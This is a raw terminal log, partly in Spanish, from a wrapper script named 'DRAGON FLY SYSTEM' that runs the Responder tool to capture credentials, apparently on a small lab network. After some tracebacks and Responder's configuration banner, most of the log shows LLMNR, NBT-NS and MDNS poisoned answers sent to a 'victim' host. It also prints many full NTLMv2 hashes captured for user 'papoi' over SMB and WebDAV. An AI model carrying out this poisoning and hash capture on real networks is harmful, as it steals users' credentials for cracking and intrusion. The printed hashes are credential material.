
[!] DRAGON FLY SYSTEM
[*] Configurando interfaz: eth1
[*] Levantando interfaz de red...
[*] Asignando IP estática local a eth1...
[*] Inyectando rutas estáticas para la comunicación con la víctima...
[*] Lanzando servidor DHCP (dnsmasq)...

[+] INTERFAZ LISTA: eth1
[+] OBJETIVO: Captura de hashes NTLM / LLMNR
----------------------------------------
Exception occurred during processing of request from ('fe80::5bb6:5cce:60ed:618f', 5353, 0, 3)
Traceback (most recent call last):
File "/usr/lib/python3.13/socketserver.py", line 697, in process_request_thread
self.finish_request(request, client_address)
~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 362, in finish_request
self.RequestHandlerClass(request, client_address, self)
~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 766, in __init__
self.handle()
~~~~~~~~~~~^^
File "/usr/share/responder/poisoners/MDNS.py", line 84, in handle
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
OSError: [Errno 101] Network is unreachable
----------------------------------------
----------------------------------------
Exception occurred during processing of request from ('fe80::5bb6:5cce:60ed:618f', 5353, 0, 3)
Traceback (most recent call last):
File "/usr/lib/python3.13/socketserver.py", line 697, in process_request_thread
self.finish_request(request, client_address)
~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 362, in finish_request
self.RequestHandlerClass(request, client_address, self)
~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 766, in __init__
self.handle()
~~~~~~~~~~~^^
File "/usr/share/responder/poisoners/MDNS.py", line 102, in handle
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
OSError: [Errno 101] Network is unreachable
----------------------------------------
----------------------------------------
Exception occurred during processing of request from ('fe80::5bb6:5cce:60ed:618f', 5353, 0, 3)
Traceback (most recent call last):
File "/usr/lib/python3.13/socketserver.py", line 697, in process_request_thread
self.finish_request(request, client_address)
~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 362, in finish_request
self.RequestHandlerClass(request, client_address, self)
~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 766, in __init__
self.handle()
~~~~~~~~~~~^^
File "/usr/share/responder/poisoners/MDNS.py", line 84, in handle
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
OSError: [Errno 101] Network is unreachable
----------------------------------------
----------------------------------------
Exception occurred during processing of request from ('fe80::5bb6:5cce:60ed:618f', 5353, 0, 3)
Traceback (most recent call last):
File "/usr/lib/python3.13/socketserver.py", line 697, in process_request_thread
self.finish_request(request, client_address)
~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 362, in finish_request
self.RequestHandlerClass(request, client_address, self)
~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 766, in __init__
self.handle()
~~~~~~~~~~~^^
File "/usr/share/responder/poisoners/MDNS.py", line 102, in handle
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
OSError: [Errno 101] Network is unreachable
----------------------------------------

[*] Deteniendo procesos y restaurando red...
[+] Sistema restaurado. ¡Cacería finalizada!

[!] DRAGON FLY SYSTEM
[*] Configurando interfaz: eth1
[*] Levantando interfaz de red...
[*] Asignando IP estática local a eth1...
[*] Inyectando rutas estáticas para la comunicación con la víctima...
[*] Lanzando servidor DHCP (dnsmasq)...

[+] INTERFAZ LISTA: eth1
[+] OBJETIVO: Captura de hashes NTLM / LLMNR

[*] Deteniendo procesos y restaurando red...
[+] Sistema restaurado. ¡Cacería finalizada!

[!] DRAGON FLY SYSTEM
[*] Configurando interfaz: eth1
[*] Levantando interfaz de red...
[*] Asignando IP estática local a eth1...
[*] Inyectando rutas estáticas para la comunicación con la víctima...
[*] Lanzando servidor DHCP (dnsmasq)...

[+] INTERFAZ LISTA: eth1
[+] OBJETIVO: Captura de hashes NTLM / LLMNR
__
.----.-----.-----.-----.-----.-----.--|  |.-----.----.
|   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
|__| |_____|_____|   __|_____|__|__|_____||_____|__|
|__|

[1;31m[!] Warning: No link-local IPv6 found, using global fd17:625c:f037:2:bdac:3a7b:877d:38c2[0m
[1;31m[!] This address may not be reachable on local network![0m

[1;32m[*] [0mTips jar:
USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
BTC  -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[1;32m[+] [0mPoisoners:
LLMNR                      [1;32m[ON][0m
NBT-NS                     [1;32m[ON][0m
MDNS                       [1;32m[ON][0m
DNS                        [1;32m[ON][0m
DHCP                       [1;31m[OFF][0m
DHCPv6                     [1;31m[OFF][0m

[1;32m[+] [0mServers:
HTTP server                [1;32m[ON][0m
HTTPS server               [1;32m[ON][0m
WPAD proxy                 [1;32m[ON][0m
Auth proxy                 [1;31m[OFF][0m
SMB server                 [1;32m[ON][0m
Kerberos server            [1;32m[ON][0m
SQL server                 [1;32m[ON][0m
FTP server                 [1;32m[ON][0m
IMAP server                [1;32m[ON][0m
POP3 server                [1;32m[ON][0m
SMTP server                [1;32m[ON][0m
DNS server                 [1;32m[ON][0m
LDAP server                [1;32m[ON][0m
MQTT server                [1;32m[ON][0m
RDP server                 [1;32m[ON][0m
DCE-RPC server             [1;32m[ON][0m
WinRM server               [1;32m[ON][0m
SNMP server                [1;32m[ON][0m

[1;32m[+] [0mHTTP Options:
Always serving EXE         [1;31m[OFF][0m
Serving EXE                [1;31m[OFF][0m
Serving HTML               [1;31m[OFF][0m
Upstream Proxy             [1;31m[OFF][0m

[1;32m[+] [0mPoisoning Options:
Analyze Mode               [1;31m[OFF][0m
Force WPAD auth            [1;32m[ON][0m
Force Basic Auth           [1;31m[OFF][0m
Force LM downgrade         [1;31m[OFF][0m
Force ESS downgrade        [1;31m[OFF][0m

[1;32m[+] [0mGeneric Options:
Responder NIC              [1;35m[eth1][0m
Responder IP               [1;35m[1.0.0.1][0m
Responder IPv6             [1;35m[fd17:625c:f037:2:bdac:3a7b:877d:38c2][0m
Challenge set              [1;35m[random][0m
Don't Respond To Names     [1;35m['ISATAP', 'ISATAP.LOCAL'][0m
Don't Respond To MDNS TLD  [1;35m['_DOSVC'][0m
TTL for poisoned response  [1;35m[default][0m

[1;32m[+] [0mCurrent Session Variables:
Responder Machine Name     [1;35m[WIN-8EBOJF7VVCB][0m
Responder Domain Name      [1;35m[TW7Y.LOCAL][0m
Responder DCE-RPC Port     [1;35m[48904][0m

[1;32m[*] [0mVersion: Responder 3.2.2.0
[1;32m[*] [0mAuthor: Laurent Gaffie, <lgaffie@secorizon.com>
[1;32m
[+][0m Listening for events...

[1;31m[!] [0mError starting TCP server on port 53, check permissions or other servers running.
[1;32m[*] [NBT-NS] Poisoned answer sent to 1.0.0.10 for name WORKGROUP (service: Domain Master Browser)[0m
[1;32m[*] [NBT-NS] Poisoned answer sent to 1.0.0.10 for name WORKGROUP (service: Browser Election)[0m
[1;32m[*] [NBT-NS] Poisoned answer sent to 1.0.0.10 for name DRAGONFLY (service: File Server)[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:f70d5943712a5176:3EBCC59B59066DC59360908394752BD1:010100000000000000E0C2035DF0DC01607F56C5F654EC0C0000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:6536b1a3128bc85b:4190B2955C66A202EC4CC0F25BD29028:010100000000000000E0C2035DF0DC01070D24F1AD1CDC770000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:64866d9f2948cf38:BC4CCA01DF20ADF868CA2B43AB81AC57:010100000000000000E0C2035DF0DC016C4BAF5066A372D40000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:7822e53f6bdb213d:E840EBE94260A7071CBD0966F2FD3AE5:010100000000000000E0C2035DF0DC013E836848BC3D017B0000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:882bb9e8358b2b51:C0FB9BCA8C644EB4C08C2C9558622AB7:010100000000000000E0C2035DF0DC01E8B7DA2ADC229DB70000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:421054241ba851cd:766B3D97BF70E51D26250F43545449CA:010100000000000000E0C2035DF0DC0114E84E24663BD69C0000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:137dcb9875d0e5a9:A1B8B91D48D713C107FF829460F26A1F:010100000000000000E0C2035DF0DC01BD2E84EF5CEF16460000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:c448bf3bbb39295a:2CCB3AD3F83ED0F6C65F27879CFB51EB:010100000000000000E0C2035DF0DC01BE232AF53F28BC640000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:72f7d74c07d96839:F33B21040EB0498A5D978A6B99FA28B6:010100000000000000E0C2035DF0DC019CC0AEB3D8143F850000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [NBT-NS] Poisoned answer sent to 1.0.0.10 for name DRAGONFLY (service: Workstation/Redirector)[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:a92ea5a9b03b95e2:4627CA6E177426BAFE01755A5AD221C0:010100000000000000E0C2035DF0DC019B64513A57D2BBC80000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:5f8743c0975eb2d8:0938C9CB734AACCB8462D0EBA1FE4EC2:010100000000000000E0C2035DF0DC011EFDED7EADA046370000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:d4fb12bb99886f75:560C7DB91509536EAA83E4E6504ECD2F:010100000000000000E0C2035DF0DC01974C33D7B7DF63BA0000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:6152eefd8e9ea680:7269C30722929ED399FFFD71CE17BC3B:010100000000000000E0C2035DF0DC0115D18C9434B475760000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:7d275f312890cf1e:B860A8E8053ECF54A8372F768DB37E11:010100000000000000E0C2035DF0DC01A1F3B72736361A680000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:e4a52827ab682c84:79EEB2E369F84AE6A609CDE83D35B605:010100000000000000E0C2035DF0DC01E8DA0E4F8249E70E0000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[HTTP][0m Sending NTLM authentication request to 1.0.0.10

[1;34m[WebDAV][0m NTLMv2 Client   : [0;33m1.0.0.10[0m

[1;34m[WebDAV][0m NTLMv2 Username : [0;33m.\papoi[0m

[1;34m[WebDAV][0m NTLMv2 Hash     : [0;33mpapoi::.:13afa38935b0fa0e:A09C36DBBE3B53D728B6FFB001247A4E:01010000000000001DD6FC8D7EF0DC0124DE5C50D25346790000000002000800540057003700590001001E00570049004E002D003800450042004F004A004600370056005600430042000400140054005700370059002E004C004F00430041004C0003003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A001000000000000000000000000000000000000900280048005400540050002F0064007200610067006F006E0066006C0079002E006C006F00630061006C000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

